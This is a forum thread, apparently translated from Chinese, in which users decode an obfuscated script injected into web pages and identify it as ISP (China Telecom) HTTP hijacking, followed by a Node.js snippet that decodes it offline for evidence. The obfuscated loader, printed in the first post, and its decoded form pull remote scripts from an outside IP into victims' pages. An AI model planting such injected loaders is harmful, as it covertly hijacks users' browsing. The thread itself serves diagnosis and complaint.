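Views: 3195 | Replies: 5
Has my Firefox been hijacked by China Telecom?
When I click a link, a blank page opens; after a refresh it loads normally. I looked at the source code, and it seems to be encrypted.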
<script>var d="=iunm?=ifbe?=mjol!sfm>#tuzmftiffu#!uzqf>#ufyu0dtt#!isfg>#iuuq;0072/239/324/37;9106/dtt#?=tdsjqu!uzqf>#ufyu0kbwbtdsjqu#!tsd>#iuuq;0072/239/324/37;910d/kt#?=0tdsjqu?=tdsjqu!uzqf>#ufyu0kbwbtdsjqu#!tsd>#iuuq;0072/239/324/37;9106/kt#?=0tdsjqu?=tdsjqu!uzqf>#ufyu0kbwbtdsjqu#?wbs!q>#iuuq;0072/239/324/37;910b0t@beje>311868'uddb>NEJ{O{J5OklxO{V>'vsjq>3531:7955'tqpsu>1'fqpsu>1'psmv>bIS1dEpwM4qpMoeqb3mx[XSqZT6";function i(_,__){_+=__;var $="";for(var u=0;u<_.length;u++){var r=_.charCodeAt(u);$+=String.fromCharCode(r-1);}return $;} var c="wdndwe3msbT:UdHWkbXGtPjWGOjV6NDV6RzWGOzWDODWCNk:{[XGzZ3h:[Y[iKoOweYKk[XmlQV2wfnmtcHFud3WidnOp'tqje>372774475'bsfb>216'ut>25293::763'bpsmv>bIS1dEpwM{ZyMkFzPD5zNUNvNkZ7PEBwNkBxO{V4Mx>>'q2bsn>378'q3bsn>411'q4bsn>1'q5bsn>6'q6bsn>26'q7bsn>2'bqqe>1'ibtDpvou>1'ibtXijufVtfs>1#<=0tdsjqu?=0ifbe?=cpez!je>#c#!sjhiuNbshjo>1!upqNbshjo>1!mfguNbshjo>1!tdspmm>op!pompbe>#joju)q*#!pocfgpsfvompbe>#ttu)*#?=0cpez?=0iunm?";document.write(i(d,c));</script>
How do I decode this thing? I want to confirm whether this is China Telecom hijacking.
#1
Posted: 2014-12-11 21:05
It's not encryption, just a bit of obfuscation.
Output:
<html>
<head>
<link rel="stylesheet" type="text/css" href="http://61.128.213.26:80/5.css">
<script type="text/javascript" src="http://61.128.213.26:80/c.js"></script>
<script type="text/javascript" src="http://61.128.213.26:80/5.js"></script>
<script type="text/javascript">
var p = "http://61.128.213.26:80/a/s?adid=200757&tcca=MDIzNzI4NjkwNzU=&urip=242096844&sport=0&eport=0&orlu=aHR0cDovL3poLndpa2lwZWRpYS5vcmcvd2lraS9TcGVjaWFsOiVFNiU5MCU5QyVFNyVCNCVBMj9zZWFyY2g9ZXZhJnNvdXJjZWlkPU1vemlsbGEtc2VhcmNo&spid=261663364&area=105&ts=1418299652&aorlu=aHR0cDovLzYxLjEyOC4yMTMuMjY6ODAvMjAwNzU3Lw==&p1arm=267&p2arm=300&p3arm=0&p4arm=5&p5arm=15&p6arm=1&appd=0&hasCount=0&hasWhiteUser=0";
</script>
</head>
<body id="b" rightMargin=0 topMargin=0 leftMargin=0 scroll=no onload="init(p)" onbeforeunload="sst()"></body>
</html>
The IP you looked up: 61.128.213.26
This is China Telecom HTTP session hijacking, no doubt about it. First call 10000 to complain and present the evidence; if they don't deal with it, file a complaint with the Ministry of Industry and Information Technology (MIIT): http://www.chinatcc.gov.cn:8080/cms/shensus/
#2
Posted: 2014-12-12 09:36
#3
Posted: 2014-12-12 13:10
charon0622: How do you read that code? Can it be converted automatically?
This kind of decryption is simple: just replace document.write with alert and run it.
#4
Posted: 2014-12-13 12:18
#5
Posted: 2014-12-14 21:10
The strings are just simply encrypted. The function i inside is what decrypts them.
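The decoding discussed in this thread can be done without running the injected page at all. The following is an added example, not code from any poster: it applies the same minus-one shift as function i in Node.js, then lists the hosts the decoded markup loads from and unpacks any base64 query value that decodes to a URL. SAMPLE_D and SAMPLE_C are a short excerpt constructed from the payload in the first post, and the function names are hypothetical.

```javascript
// Added example (Node.js). Function names are hypothetical; nothing is written to a DOM.
// SAMPLE_D / SAMPLE_C: short excerpt constructed from the payload posted in the thread.
const SAMPLE_D = "=tdsjqu!uzqf>#ufyu0kbwbtdsjqu#!tsd>#iuuq;0072/239/324/37;910d/kt#?=0tdsjqu?" +
  "=tdsjqu?wbs!q>#iuuq;0072/239/324/37;910b0t@beje>311868";
const SAMPLE_C = "'bpsmv>bIS1dEpwM{ZyMkFzPD5zNUNvNkZ7PEBwNkBxO{V4Mx>>#<=0tdsjqu?";

// Same transform as the page's function i(): concatenate, then subtract 1 from each char code.
function deobfuscate(d, c) {
  let out = "";
  for (const ch of d + c) out += String.fromCharCode(ch.charCodeAt(0) - 1);
  return out;
}

// List the hosts referenced by the decoded markup and unpack base64 query
// values that decode to a URL (assumption: such values carry URLs, as the
// output posted in reply #1 suggests).
function analyze(html) {
  const hosts = new Set();
  const embedded = {};
  for (const raw of html.match(/https?:\/\/[^\s"'<>]+/g) || []) {
    let u;
    try { u = new URL(raw); } catch { continue; }   // skip anything that is not a valid URL
    hosts.add(u.host);                              // default port 80 is normalised away
    for (const [name, value] of u.searchParams) {
      if (value.length % 4 !== 0 || !/^[A-Za-z0-9+\/]+={0,2}$/.test(value)) continue;
      const text = Buffer.from(value, "base64").toString("utf8");
      if (/^https?:\/\//.test(text)) embedded[name] = text;
    }
  }
  return { hosts: [...hosts], embedded };
}

const decoded = deobfuscate(SAMPLE_D, SAMPLE_C);
console.log(decoded);
console.log(analyze(decoded));
```

Run against the full d and c strings from the first post, the same two functions give the host list and decoded parameters to attach to a complaint as evidence.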